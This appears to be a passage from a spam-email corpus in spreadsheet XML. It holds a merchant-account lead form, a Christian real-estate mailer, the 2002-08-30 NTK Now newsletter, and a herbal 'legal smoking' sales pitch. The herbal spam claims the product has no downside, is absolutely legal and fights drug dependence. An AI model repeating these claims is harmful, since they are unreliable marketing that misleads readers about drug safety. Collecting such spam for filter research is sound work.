               &lt;td width=3D"12%" align=3D"center"&gt;&lt;input type=3D"radio" val=
 ue=3D"mailorder" name=3D"Type_Business"&gt;&lt;/td&gt;
               &lt;td width=3D"88%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Mail Order Business&lt;/b=
 &gt;&lt;/font&gt;&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td width=3D"12%" align=3D"center"&gt;&lt;input type=3D"radio" val=
 ue=3D"internet" name=3D"Type_Business"&gt;&lt;/td&gt;
               &lt;td width=3D"88%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Internet Based Busines=
 s&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
         &lt;/div&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"61%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Personal Credi=
 t Rating:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"39%"&gt;
         &lt;div align=3D"left"&gt;
           &lt;table border=3D"0" width=3D"95%"&gt;
             &lt;tr&gt;
               &lt;td width=3D"12%" align=3D"center"&gt;&lt;input type=3D"radio" val=
 ue=3D"excellent" name=3D"Credit_Rank"&gt;&lt;/td&gt;
               &lt;td width=3D"88%"&gt;Excellent&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td width=3D"12%" align=3D"center"&gt;&lt;input type=3D"radio" val=
 ue=3D"good" name=3D"Credit_Rank"&gt;&lt;/td&gt;
               &lt;td width=3D"88%"&gt;Good&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td width=3D"12%" align=3D"center"&gt;&lt;input type=3D"radio" val=
 ue=3D"fair" name=3D"Credit_Rank"&gt;&lt;/td&gt;
               &lt;td width=3D"88%"&gt;Fair&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td width=3D"12%" align=3D"center"&gt;&lt;input type=3D"radio" val=
 ue=3D"poor" name=3D"Credit_Rank"&gt;&lt;/td&gt;
               &lt;td width=3D"88%"&gt;Poor&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
         &lt;/div&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"61%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;How Soon Would=
  You Like a Merchant
         Account?&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"39%"&gt;
         &lt;p align=3D"center"&gt;&lt;input type=3D"text" name=3D"How_Soon" size=3D=
 "29"&gt;&lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" colspan=3D"2"&gt;
         &lt;div align=3D"center"&gt;
           &lt;center&gt;
           &lt;table border=3D"0" width=3D"13%"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%"&gt;
                 &lt;p align=3D"center"&gt;&lt;input type=3D"submit" value=3D"Submit=
 " name=3D"B1"&gt;&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
       &lt;/td&gt;&lt;/form&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;&lt;br&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"3" cellspacing=3D"0" width=3D"85%" bgcolor=3D"#E8E8E8" =
 bordercolor=3D"#C0C0C0"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" bgcolor=3D"#E8E8E8"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Your info=
 rmation is confidential, it will not be sold or used for any other purpose,=
  and you are under no obligation=2E
         Your information will be used solely for the purpose of evaluating=
  your business or website for a merchant account so that you may begin acce=
 pting credit card payments=2E&lt;/b&gt;&lt;/font&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;/form&gt;
 &lt;p align=3D"center"&gt;
 &lt;br&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#FF0000"&gt;List
  Removal/OPT-OUT Option&lt;/font&gt;&lt;/b&gt;
  &lt;br&gt;&lt;b&gt;&lt;font color=3D"#000000"&gt;&lt;font size=3D-1&gt;&lt;a
  href=3D"mailto:mbmwpk@netscape=2Enet?subject=3Dremove"&gt;Click
  Here&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;m
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_001_0080_01BDF6C7.FABAC1B0--
 ------=_NextPart_000_007F_01BDF6C7.FABAC1B0--
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_1C148_01C237B4.616C6590
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 Home for Sale? 
 List with us! &lt;http://www.clrea.com/whyusseller.cfm&gt; 
 Buying a home is an important step in your life and quite possibly the
 largest purchase you will ever make. A trustworthy and reliable agent is
 what you're looking for but often times it can be difficult to find a
 real estate agent deserving of your trust.
 Through recommendations and client evaluations we've assembled a
 national association of Christian Real Estate Agents
 &lt;http://www.clrea.com/philosophy.cfm&gt;  dedicated to fair business
 practices and the teachings of our savior.
 Christian Agents, Lenders, Appraisers and Inspectors: Click Here
 &lt;http://www.clrea.com/assbenefits.cfm&gt;  to learn more about joining our
 family of Christian Real Estate Professionals
 Follow these easy steps &lt;http://www.clrea.com/howworkbuyers.cfm&gt;  and
 we'll take care of the rest...
 1. Describe the property you are looking using our Buyer's Information
 Form &lt;http://www.clrea.com/buyersform.cfm&gt; .
 2. Our Christian Living Real Estate Associate Agent contacts you at your
 convenience to get a better understanding of your specific real estate
 needs.
 3. Our Christian Living Real Estate Associate Agent suggests properties
 that fit your criteria and arranges for you to view the properties that
 interest you.
 4. During the decision making process, our Associate Christian Agent
 provides reliable and honest guidance to get you the best possible deal.
 5. When you've decided on a property to purchase, our agent makes all
 the necessary preparations to ensure a trouble free transaction.
  &lt;http://clrea.com&gt; 
 To be removed from this list click here
 &lt;http://www.clrea.com/market/autooptout.cfm?address=jm@jmason.org&amp;campai
 gn=52&gt;  
 ------=_NextPart_000_1C148_01C237B4.616C6590
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;for home buyers&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Diso-8859-1"&gt;&lt;!-- Fireworks 4.0  Dreamweaver 4.0 target.  =
 Created Thu May 16 19:54:49 GMT-0700 (Pacific Daylight Time) 2002--&gt;
 &lt;STYLE type=3Dtext/css&gt;&lt;/STYLE&gt;
 &lt;META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial color=3D#0000ff size=3D2&gt;&lt;/FONT&gt; &lt;/DIV&gt;
 &lt;BLOCKQUOTE&gt;
   &lt;TABLE cellSpacing=3D0 cellPadding=3D5 width=3D500 align=3Dcenter =
 border=3D1&gt;
     &lt;TBODY&gt;
     &lt;TR&gt;
       &lt;TD vAlign=3Dcenter&gt;
         &lt;DIV align=3Dcenter&gt;
         &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D500 =
 align=3Dcenter border=3D0&gt;&lt;!-- fwtable fwsrc=3D"rebuyers.png" =
 fwbase=3D"mailer2.gif" fwstyle=3D"Dreamweaver" fwdocid =3D "742308039" =
 fwnested=3D"1" --&gt;
           &lt;TBODY&gt;
           &lt;TR&gt;
             &lt;TD colSpan=3D2&gt;&lt;IMG height=3D124=20
               =
 src=3D"http://www.clrea.com/emarketing/rebuyers/mailer2_r1_c1.gif"=20
               width=3D500 border=3D0 name=3Dmailer2_r1_c1 =
 NOSEND=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;
           &lt;TR&gt;
             &lt;TD vAlign=3Dtop&gt;
               &lt;P align=3Dleft&gt;&lt;IMG height=3D626=20
               =
 src=3D"http://www.clrea.com/emarketing/rebuyers/mailer2_r2_c1.gif"=20
               width=3D174 useMap=3D#mailer2_r2_c1Map border=3D0 =
 name=3Dmailer2_r2_c1=20
               NOSEND=3D"1"&gt;&lt;/P&gt;
               &lt;P align=3Dcenter&gt;&lt;FONT face=3D"Arial, Helvetica, =
 sans-serif"=20
               size=3D2&gt;&lt;B&gt;&lt;A =
 href=3D"http://www.clrea.com/whyusseller.cfm"&gt;&lt;FONT=20
               size=3D3&gt;Home for Sale? &lt;BR&gt;List with=20
             us!&lt;/FONT&gt;&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
             &lt;TD vAlign=3Dtop width=3D313 height=3D671&gt;
               &lt;P&gt;&lt;B&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" =
 size=3D2&gt;Buying a=20
               home is an important step in your life and quite possibly =
 the=20
               largest purchase you will ever make. A trustworthy and =
 reliable=20
               agent is what you're looking for but often times it can be =
               difficult to find a real estate agent deserving of your=20
               trust.&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
               &lt;P&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" =
 size=3D2&gt;Through=20
               recommendations and client evaluations we've assembled a =
 national=20
               association of &lt;A onfocus=3Dif(this.blur)this.blur()=20
               href=3D"http://www.clrea.com/philosophy.cfm"&gt;Christian =
 Real Estate=20
               Agents&lt;/A&gt; dedicated to fair business practices and the =
 teachings=20
               of our savior.&lt;/FONT&gt;&lt;/P&gt;
               &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Christian=20
                 Agents, Lenders, Appraisers and Inspectors: &lt;a =
 href=3D"http://www.clrea.com/assbenefits.cfm"&gt;Click=20
                 Here&lt;/a&gt; to learn more about joining our family of =
 Christian Real=20
                 Estate Professionals&lt;/font&gt;&lt;/p&gt;
               &lt;P&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" =
 size=3D2&gt;&lt;B&gt;Follow=20
               these &lt;A onfocus=3Dif(this.blur)this.blur()=20
               href=3D"http://www.clrea.com/howworkbuyers.cfm"&gt;easy =
 steps&lt;/A&gt; and=20
               we'll take care of the rest...&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
               &lt;P&gt;&lt;FONT face=3D"Times New Roman, Times, serif" =
 size=3D3&gt;&lt;B&gt;&lt;FONT=20
               face=3D"Arial, Helvetica, sans-serif" =
 color=3D#0000ff&gt;1&lt;/FONT&gt;&lt;FONT=20
               face=3D"Arial, Helvetica, sans-serif" =
 size=3D2&gt;.&lt;/FONT&gt;&lt;/B&gt;&lt;FONT=20
               face=3D"Arial, Helvetica, sans-serif" size=3D2&gt; Describe =
 the property=20
               you are looking using our &lt;A =
 onfocus=3Dif(this.blur)this.blur()=20
               href=3D"http://www.clrea.com/buyersform.cfm"&gt;&lt;B&gt;Buyer's =
 Information=20
               Form&lt;/B&gt;&lt;/A&gt;.&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
               &lt;P&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" =
 size=3D2&gt;&lt;B&gt;&lt;FONT=20
               color=3D#0000ff size=3D3&gt;2&lt;/FONT&gt;.&lt;/B&gt; Our Christian =
 Living Real=20
               Estate Associate Agent contacts you at your convenience to =
 get a=20
               better understanding of your specific real estate=20
 needs.&lt;/FONT&gt;&lt;/P&gt;
               &lt;P&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" =
 size=3D2&gt;&lt;B&gt;&lt;FONT=20
               color=3D#0000ff size=3D3&gt;3&lt;/FONT&gt;.&lt;/B&gt; Our Christian =
 Living Real=20
               Estate Associate Agent suggests properties that fit your =
 criteria=20
               and arranges for you to view the properties that interest=20
               you.&lt;/FONT&gt;&lt;/P&gt;
               &lt;P&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" =
 size=3D2&gt;&lt;B&gt;&lt;FONT=20
               color=3D#0000ff size=3D3&gt;4&lt;/FONT&gt;.&lt;/B&gt; During the decision =
 making=20
               process, our Associate Christian Agent provides reliable =
 and=20
               honest guidance to get you the best possible =
 deal.&lt;/FONT&gt;&lt;/P&gt;
               &lt;P&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" =
 size=3D2&gt;&lt;B&gt;&lt;FONT=20
               color=3D#0000ff size=3D3&gt;5&lt;/FONT&gt;.&lt;/B&gt; When you've decided =
 on a=20
               property to purchase, our agent makes all the necessary=20
               preparations to ensure a trouble free =
 transaction.&lt;BR&gt;&lt;/FONT&gt;&lt;FONT=20
               face=3D"Times New Roman, Times, serif" size=3D3&gt;&lt;BR&gt;&lt;A=20
               onfocus=3Dif(this.blur)this.blur() =
 href=3D"http://clrea.com"&gt;&lt;IMG=20
               height=3D59=20
               =
 src=3D"http://www.clrea.com/emarketing/rebuyers/button.gif"=20
               width=3D310 border=3D0=20
         NOSEND=3D"1"&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;FONT =
 face=3DVerdana=20
         color=3Dblack size=3D-2&gt;To be removed from this list &lt;A=20
         =
 href=3D"http://www.clrea.com/market/autooptout.cfm?address=3Djm@jmason.or=
 g&amp;campaign=3D52"&gt;click=20
         here&lt;/A&gt;&lt;/FONT&gt; =
 &lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/BLOCKQUOTE&gt;&lt;MAP=20
 name=3Dmailer2_r2_c1Map&gt;&lt;AREA onfocus=3Dif(this.blur)this.blur() =
 shape=3DRECT=20
   coords=3D13,456,159,505=20
 href=3D"http://www.clrea.com/whyusfinance.cfm?class=3D1"&gt;&lt;/MAP&gt;&lt;/BODY&gt;&lt;/H=
 TML&gt;
 ------=_NextPart_000_1C148_01C237B4.616C6590--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NTK Now, 2002-08-30
</t>
  </si>
  <si>
    <t xml:space="preserve">
  _   _ _____ _  __ &lt;*the* weekly high-tech sarcastic update for the uk&gt;
 | \ | |_   _| |/ / _ __   __2002-08-30_ o join! mail an empty message to
 |  \| | | | | ' / | '_ \ / _ \ \ /\ / / o ntknow-subscribe@lists.ntk.net
 | |\  | | | | . \ | | | | (_) \ v  v /  o website (+ archive) lives at:
 |_| \_| |_| |_|\_\|_| |_|\___/ \_/\_/   o     http://www.ntk.net/
         "A case in point is web designer Matt Jones, the man 
          responsible for how BBC News Online looked when it launched. 
          Since then, he has invented 'warchalking', which he recently 
          described as a 'curse'..."
                               http://news.bbc.co.uk/1/hi/2210091.stm
                   - but you cannot turn against me! I... created you!
                                 &gt;&gt; HARD NEWS &lt;&lt;
                                stiffening sinews
          More hot summer days in the mailinglist alleyways,
          dangerously empty of sane postings, strewn with the rotting
          carcasses of broiling vacation messages. Hacktress and
          Silicon Valley's chief rat-keeper LILE ELAM, excitedly posts
          about a new open 802.11 network she's found. "I am here at
          the police station waiting to see a judge and I thought I
          would check to see if there is connectivity", she writes,
          somewhat recklessly, to the Bay Area Wireless list. Exit
          the rest of the Wifi community through the nearest window
          and out into the streets... where, cooling tempers, the
          Microsoft Palladium boys are on an endless summer tour,
          reassuring the experts that while, hmm, they *suppose* Pd
          could *theoretically* be used as a Hollywood DRM system,
          they truly have no plans to do any such thing. Cypherpunk
          and friend of freedom Lucky Green hears this; thinks up four
          or five of the obvious Palladium DRM implementations; sends
          them off to be patented in his name. Licensing funds, we
          imagine, will go on cracking his own DRMs. And so the mail
          loops on.
          http://lists.bawug.org/pipermail/wireless/2002-August/008507.html
                                  - administrivia: HI MOM, I'M IN JAIL
     http://www.mail-archive.com/cryptography@wasabisystems.com/msg02554.html
                              - Green/Palladium, like Green Kryptonite
          Could Lucky get himself arrested under the DMCA for
          distributing a circumvention device? Worse: now we have the
          EUCD incoming, could he here in the UK? Will Alan Cox go to
          jail for posting detailed Changelogs? Will even the nicest
          UK cryptographer (or curious garage tinkerer) find
          themselves hauled up under our new and scarily DMCAish
          copyright regime? Find out the facts at the free FAIR DEAL
          FOR COPYRIGHT conference, organised by the irrepressible
          FOUNDATION FOR INFORMATION POLICY RESEARCH for Wednesday
          2002-09-18 at the London School of Economics. All the usual
          fun from the creators of the Scrambling for Safety crypto
          cons: we confidently predict government spokesmen caught in
          headlights, wanton Dave Bird heckling, some industry bigwig
          fighting off the audience with a broken chairleg, and other
          epiphenomena of the interzone between legal minds and hacker
          ethics. Oh, and FIPR are still looking for a Programme
          Director, so if you're interested, let them know. We
          suggested a convention raffle (first prize: the director's
          job, second prize: Ross Anderson as your personal slave for
          a day). They say there's some rule that would break, though.
          http://www.fipr.org/vacancy.html
 - doesn't the Foundation use psychohistory for filling these positions?
          For those of us who can't read the abbreviation EULA without 
          thinking of Martian fighting machines and their "deafening 
          howls... which roared like thunder", we're sorry to report 
          that this weekend's multimedia performance of Jeff Wayne's WAR 
          OF THE WORLDS has been postponed due to "health and safety 
          issues". The event was to feature computer graphics, 
          fireworks, "60ft-tall Martian fighting machines" wreaking 
          "havoc and destruction", and - most terrifyingly of all - the 
          possibility of a David Essex tribute singer performing with 
          Hawkwind, but UKP18 tickets for the Sat 2002-08-31 show at 
          Manchester's Heaton Park will still be valid at a range of new 
          venues next summer. Ironically, the Martians' original 
          invasion plans were similarly thwarted by health and safety 
          issues, "slain after all man's devices had failed by the 
          humblest creatures that God, in his wisdom, has put upon this 
          earth: bacteria. Minute, invisible, bacteria. For, directly 
          the invaders arrived and drank and fed, our microscopic allies 
          attacked them..."
          http://www.waroftheworlds.info/postpone.htm
                            - "...From that moment, they were doomed."
                                 &gt;&gt; ANTI-NEWS &lt;&lt;
                              berating the obvious
          moving on from PUERILE GOOGLE MISSPELLINGS, weird search-and-
          replace artefact: http://www.google.com/search?q=consideyellow ,
          Japanese fan sites for "plince", "steery dan", "def reppard" 
          et al, plus the 18,000 or more self-referential Usenet .sigs: 
          http://groups.google.com/groups?q=%22get+random+signatures%22 
          ...http://www.colocation-network.com/ "Zerodowntime" ad leads 
          to: http://www.ntk.net/2002/08/30/dohzero.gif ... slightly 
          harsh alt text: http://www.ntk.net/2002/08/30/dohover.gif ... 
          US military discovers the only "translator" those bastards 
          seem to understand: http://www.ntk.net/2002/08/30/dohgun.gif 
          ... scary blue men herald return of the bizarre BBC hacking 
          pics: http://news.bbc.co.uk/1/hi/1494091.stm ... reporter RYAN 
          DILLEY http://news.bbc.co.uk/1/hi/uk/2202552.stm pulls his 
          http://starwars.org.pl/galeria/e2/char/anakin/t001.jpg face 
          ... banjo maestro GEORGE FORMBY still alive, cooking, black: 
      http://www.readersheds.co.uk/readersheds/shop.cfm?WOSNAMES=Wosnames
          ... thanks guys, that ought to do it: http://www.eap.ca/ ... 
                                &gt;&gt; EVENT QUEUE &lt;&lt;
                          goto's considered non-harmful
          Controversially, we're all in favour of THE GUARDIAN GREAT 
          BRITISH BLOG COMPETITION (closing date next Fri 2002-09-06, 
          first prize UKP1000, entry free), in that any initiative that 
          encourages this notoriously primadonna-ish "community" to try 
          and engage with real-world notions of editorial quality surely 
          has to be a good thing. Our only disappointment is that The 
          Guardian appears to be focussing on the "best" of the entries, 
          when everyone knows the real fun is to be had cruising the 
          truly terrible examples that the genre has to offer, mentally 
          allocating points for "Most Depressing Recycling Of Daypop Top
          40 URLs", "Most Unsettling Revelations About Personal Life", 
          plus of course "Most Tedious Linking/Reciprocal Linking To Other 
          Bloggers In Absence Of Having Anything Interesting To Say". 
          http://www.guardian.co.uk/weblog/bestbritishblog/
                               - "A strange game, Professor Falken..."
        http://media.guardian.co.uk/newmedia/comment/0,7496,765161,00.html
                          - "...the only winning move is not to play."
                                 &gt;&gt; TRACKING &lt;&lt;
                sufficiently advanced technology : the gathering
           The respective trademark holders will hate this, but
           Windows really *is* like the Sun. You have this big hulking
           mass of concentrated power in the middle, with a few small
           orbiting utilities - like WinZip, and PuTTY, and VNC.
           Occasionally one will get a bit too close to the OS, and
           Microsoft will suck it down and turn it into fuel for the
           System. One such discrete satellite remains FILEZILLA, the
           still-necessary ftp gui client for Windows. Those who know
           it won't need the introduction, although they might
           appreciate the note that it's getting close to v2.0 time.
           For dogged WS_FTP users, though, it's got multiple
           downloads, auto-restart of interrupted 'loads, queuing, and
           sftp and Kerberos support. It's also GPL'd which makes it a
           nice bit of source for anyone wanting to grok Win32
           networking from something that works.
           http://filezilla.sf.net/
   - talking of trademarks, will the Godzilla people strike before MS?
                                 &gt;&gt; MEMEPOOL &lt;&lt;
                 ceci n'est pas une http://www.gagpipe.com/
          (Not safe for work) next year's RED NOSE DAY looks more fun 
          than usual: http://www.threepillows.com/tour2.htm ... Mirrored 
          Disaster Recovery Suite - to go with mirrored bathroom etc?: 
        http://www.dovebid.com/Auctions/AuctionDetail.asp?AuctionID=1450
          ... and then the kid can take you to court for mental cruelty: 
          http://www.cnn.com/2002/TECH/ptech/08/27/turok.baby.reut/ ... 
          "funny" prefixes in front of "chalking" #n+1 - the actually 
          quite pragmatic: http://www.pinkbunny.co.uk/poochalking/ ... 
          no longer knowing - or caring - if these are prank AMAZON 
          reviews or not, for Potter's ever-popular "vibrating" broom: 
      http://www.amazon.com/exec/obidos/tg/stores/detail/-/toys/B00005NEBW/
          ... ditto "Use This Software At Your Own Risk" disclaimer for: 
          http://www.palmgear.com/software/showsoftware.cfm?prodID=41030 
          ... DAFFY DUCK appears in dock - accused of "dethpicable" 
          behaviour?: http://news.bbc.co.uk/1/hi/england/2223065.stm , 
          http://www.ananova.com/news/story/sm_659889.html ...
                                 &gt;&gt; GEEK MEDIA &lt;&lt;
                                   get out less
          TV&gt;&gt; celebrity cameo night tonight, with Brad Pitt in FRIENDS 
          (9pm, Fri, C4), Sydney Pollack in WILL AND GRACE (9.30pm, Fri, 
          C4), Dustin Hoffman in V GRAHAM NORTON (10.30pm, Fri, C4), and 
          a singing, dancing peanut in globalised trade documentary ALT-
          TV (7.30pm, Fri, C4)... the BBC have kept McEnroe and the 
          heart monitor, got rid of the live crocodiles in gimmicky 
          quizshow THE CHAIR (6.40pm, Sat, BBC1)... and a month of 
          "September 11th" specials kicks off with AVENGING TERROR (8pm, 
          Sat &amp; Sun, C4) - yet those responsible for BOWFINGER (9pm, 
          Sat, C4) and NOTTING HILL (9pm, Sun, C4) still remain 
          unpunished... John "The Last Seduction" Dahl's ROUNDERS (11pm, 
          Sat, BBC2) turns out to be about high-stakes poker, rather 
          than the girls' version of baseball... in the wake of DAVE 
          GORMAN'S IMPORTANT ASTROLOGY EXPERIMENT (10.40pm, Sun, BBC2), 
          how about a three-way challenge where he, Tony Hawks and Pete 
          McCarthy battle to come up with the most lucrative pointless 
          pretext for a book and TV show?... but we still have a soft 
          spot for Ron "Alien: Resurrection" Perlman liberal self-
          flagellation THE LAST SUPPER (11.20pm, Sun, C4)... 9/11 CLEAR 
          THE SKIES (9pm, Sun, BBC2) is a presumably uneventful account 
          of "how US air defence systems responded to the events of 
          September 11th"... inexplicably, the three finalists in THE 
          TARTIEST MEN IN BRITAIN (10.30pm, Mon, ITV) all come from 
          Leeds... Larry Clark takes a somewhat indirect approach to 
          conveying his safe-sex message in New York filth-fest KIDS 
          (1.15am, Tue, C4)... and the September 11th build-up continues 
          with HOW THE TWIN TOWERS COLLAPSED (8pm, Mon, C4), LET'S ROLL: 
          THE STORY OF FLIGHT 93 (10.30pm, Wed, ITV), plus THE MEYSSAN 
          CONSPIRACY (11.05pm, Tue, C4) - ie the French guy behind: 
        http://www.asile.org/citoyens/numero13/pentagone/erreurs_en.htm
          ... away from the polluted nightmare of modern living, a 
          family seek out a new way of life in Earth Summit tie-in A 
          LAND WORTH LOVING (7pm, Wed, BBC1)... which coincidentally 
          also forms the plot of this week's second Heather "Bowfinger" 
          Graham turkey, LOST IN SPACE (7.55pm, Wed, BBC1) - not to be 
          confused with the return of those annoying posh women in 
          WORLD'S WORST DRESSED (8pm, Wed, BBC2), who have at least shut 
          up about their always-doomed hideously purple e-commerce 
          site: http://news.bbc.co.uk/1/hi/business/712188.stm ...
          FILM&gt;&gt; the comic skills of Cameron Diaz, Christina Applegate 
          and Parker Posey combine in a cross between a teen smut comedy 
          and an episode of "Sex And The City", THE SWEETEST THING 
          ( http://www.screenit.com/movies/2002/the_sweetest_thing.html :
          As [Diaz] and [Applegate] drive down the road still dressed in 
          just their bras and underwear, [Applegate] drops her bottle of 
          fingernail polish. [Diaz] then goes over to get it, with 
          her panty-covered butt in the air and her head down toward 
          [Applegate]'s legs and crotch; [Selma Blair] [has] her mouth 
          stuck around a man's privates after apparently performing oral 
          sex on him)... Robin Williams plays a surprisingly convincing 
          Hannibal Lecter in morally complicated Alaskan Al Pacino 
          murder madness INSOMNIA ( http://www.cndb.com/ : You can see 
          [Crystal Lowe's] tits in autopsy photos and again - along with 
          bush - when she's seen on a autopsy table. Nice boobs but 
          she's dead)... it's Eddie Murphy, Randy Quaid, Jay "Jerry 
          Maguire" Mohr, John Cleese and Pam Grier - together at last! - 
          in blaxploitation sci-fi spoof THE ADVENTURES OF PLUTO NASH 
   ( http://www.screenit.com/movies/2002/the_adventures_of_pluto_nash.html :
          the woman then causes the image of [Rosario "Kids" Dawson] to 
          suddenly have much larger breasts and an exaggeratedly large 
          rear end)... all of which, shockingly, are an improvement on 
          John Woo interspersing lame battle scenes with agonising anti-
          racist philosophising in WW2 Navajo crypto clunker WINDTALKERS 
          ( http://www.capalert.com/capreports/windtalkers.htm : 
          gambling; beheading; brief partial nudity of a Japanese 
          soldier; I have no doubt that such gore is present in war but 
          must it be regurgitated in and as entertainment?)... 
                                &gt;&gt; SMALL PRINT &lt;&lt;
        Need to Know is a useful and interesting UK digest of things that
          happened last week or might happen next week. You can read it
        on Friday afternoon or print it out then take it home if you have
      nothing better to do. It is compiled by NTK from stuff they get sent.
                        Registered at the Post Office as
                      "yeah, but bet we were banned first"
                     http://www.b3ta.com/newsletter/issue54/
                                  NEED TO KNOW
             THEY STOLE OUR REVOLUTION. NOW WE'RE STEALING IT BACK.
                          Archive - http://www.ntk.net/
               Unsubscribe? Mail ntknow-unsubscribe@lists.ntk.net
                 Subscribe? Mail ntknow-subscribe@lists.ntk.net
  NTK now is supported by UNFORTU.NET, and by you: http://www.geekstyle.co.uk/
                           (K) 2002 Special Projects.
              Copying is fine, but include URL: http://www.ntk.net/
                     Tips, news and gossip to tips@spesh.com
              All communication is for publication, unless you beg.
               Press releases from naive PR people to pr@spesh.com
      Remember: Your work email may be monitored if sending sensitive material.
        Sending &gt;500KB attachments is forbidden by the Geneva Convention.
               Your country may be at risk if you fail to comply.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cannabis Difference
</t>
  </si>
  <si>
    <t xml:space="preserve">****Mid-Summer Customer Appreciation SALE!****
 To express our appreciation to all of our loyal customers, we are offering the following products "2 for 1"  for a limited time only.  Ragga Dagga, Stoney Mahoney, Sweet Vjestika, Aqueous Kathmandu, along with a free 1oz. package of Capillaris Herba.
 We have three (3) NEW Renegade Botanicals From Exotic Botanical Resources, the ethnobotanical herbalists who brought the herba supplementals Kathmandu Temple Kiff 1 &amp; 2 Personal Choice, pipe-smoking products/substances to the common market!
 Announcing:
 1.  Temple 3 Ragga Dagga (tm)
 2.  Aqueous Kathmandu (tm)
 3.  Stoney Mahoney (tm)
 ***********************************
 TEMPLE 3 RAGGA DAGGA
 ***********************************
 We are finally able to offer for your Sensitive/Responsive, Personal Choice Smoking Enjoyment, the Temple 3 Ragga Dagga (tm) Pipe-Smoking Substance Supplemental Product.  Introduced after three years of research and development, Temple 3 is Personal Choice, legal Smoking/Indulgence Redefined!!!  
 Thanks to recent, dramatic, technological advances in the laboratorial processes for the extraction of alkaloid and glycocide supplements from botanicals/herbas/plant matter, we are now able to offer, in more cultivated/enhanced/viripotent/substantiated format, what had actually already been the most significant, lawful, Personal Choice smoking substance available on the planet.  Temple 3 Ragga Dagga (tm) is the sweet, sweet evolution of all of that. 
 * A 20 X more viripotent herba supplement than its predecessors (Temple 1 &amp; 2)! 
 * Happier, happy smoking!
 * Indeed, a depressive/regressive, supplemental mood-enhancer.
 * More sophisticated, uplifting &amp; poised than illegal smoking substances.
 * NO regulation; NO illegality; NO failed drug tests!
 * Inhibits stress &amp; anxiety!
 * Inspires conteplativeness &amp; creativity!
 * Ehances the sexual experience!
 * Generates more restful sleep &amp; lucid dreaming!
 * A significant herba/botanical supplement in the battles against drug &amp; alcohol dependence!
 * Easily ignited &amp; stoked.
 * Smokes sweetly!
 * Absolutely legal; non-invasive; no downside!
 * Lingers for a good, goodly while!
 * Possesses many fine ganja virtues with none of the negatives!
 * Just a little snippet/pinch goes a long, long way.  Just 4 or 5 draws of your pipe (a traditional hand herb-pipe is included with each package of Temple 3 Ragga Dagga).
 Temple 3 Ragga Dagga (tm) is an exclusive, botanical/herba, proprietary, Nepalese-formulated, "Sensitive/Responsive" pipe-smoking/stoking substance, and it is undoubtedly the most prestigious, legal offering of its sort on the planet!
 So smokin' stokin' potent is this cutting edge formulation, that we have even been able to establish a very happy clientele market base within the hard-core stoner arena and have made positive, happy, smoking differences in many, many lives.
 ABSOLUTELY LEGAL!  MARVELOUSLY POTENT!!
